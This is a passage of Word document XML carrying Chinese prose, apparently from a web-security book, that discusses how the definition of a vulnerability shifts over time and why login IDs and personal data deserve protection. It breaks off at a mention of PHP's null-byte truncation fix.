        <w:t>互联网本来是安全的，自从有了研究安全的人，就变得不安全了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="176" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有的程序本来也没有漏洞，只有功能，但当一些功能被用于破坏，造成损失时，也就成了漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们定义一个功能是否是漏洞，只看后果，而不应该看过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算机用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义了整个世界，但在整个世界中，并非所有事情都能简单地用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t>” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:hanging="68"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>来判断，漏洞也是如此，因为破坏有程度轻重之分，当破坏程度超过某一临界值时，多数    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（注意不是所有人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>会接受这是一个漏洞的事实。但事物是变化的，这个临界值也不是一成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-26"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>不变的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="33"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>多数人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="2"/>
          <w:w w:val="33"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>也不是一成不变的，所以我们要用变化的观点去看待变化的事物。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="202" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>泄露用户个人信息，比如电话、住址，在以前几乎称不上漏洞，因为没有人利用；但在互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>联网越来越关心用户隐私的今天，这就变成了一个严重的问题，因为有无数的坏人时刻在想着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>利用这些信息搞破坏，非法攫取利益。所以，今天如果发现某网站能够批量、未经授权获取到用户个人信息，这就是一个漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3064;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,17.509863pt" to="158.16pt,17.509863pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="316" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="315" w:right="0" w:hanging="112"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark2" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:bookmarkStart w:name="_bookmark2" w:id="51"/>
        <w:bookmarkEnd w:id="51"/>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>ttp://hi.baidu.com/aullik5/blog/item/d4b8c81270601c3fdd54013e.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="357" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="106" w:after="0"/>
        <w:ind w:left="356" w:right="0" w:hanging="153"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark3" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:bookmarkStart w:name="_bookmark3" w:id="53"/>
        <w:bookmarkEnd w:id="53"/>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>ht</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>tp://hi.baidu.com/aullik5/blog/item/60d2b5fc2524c30a09244d0c.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId23"/>
          <w:headerReference w:type="even" r:id="rId24"/>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="936" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
          <w:pgNumType w:start="23"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="113"/>
        <w:ind w:left="202" w:right="216" w:firstLine="401"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>再举个例子。用户登录的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>memberID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否属于机密信息？在以往做信息安全，我们都只知</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="70"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-64"/>
          <w:w w:val="70"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-99"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="70"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>安全问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="70"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>等传统意义上的机密信息需要保护。但是在今天，在网站的业务设计中， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>我们发现 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>loginID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>也应该属于需要保护的信息。因为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>loginID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>一旦泄露后，可能会导致被暴力破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>解；甚至有的用户将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>loginID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当成密码的一部分，会被黑客猜中用户的密码或者是黑客通过攻击一些第三方站点（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>比如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>后，找到同样的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>loginID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来尝试登录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="2"/>
        <w:ind w:left="202" w:right="125" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>正因为攻击技术在发展，所以我们对漏洞的定义也在不断变化。可能很多朋友都没有注意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>到，一个业务安全设计得好的网站，往往 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>loginID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>nickname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>昵称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>是分开的。登录 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>户的私有信息，只有用户本人能够看到；而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nickname </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>不能用于登录，但可以公开给所有人看。这种设计的细节，是网站积极防御的一种表现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="202" w:right="169" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能很多朋友仍然不愿意承认这些问题是漏洞，那么什么是漏洞呢？在我看来，漏洞只是对破坏性功能的一个统称而已。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="202" w:right="219" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>这顶帽子太大，大到我们难以承受，所以我们不妨换一个角度看，看看是否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>应  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>该修补</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>。语言真是很神奇的东西，很多时候换一个称呼，就能让人的认可度提高很多。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="223" w:firstLine="399"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>版本中，修补了很多年来万恶的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>字节截断功能 </w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark4">
        <w:r>
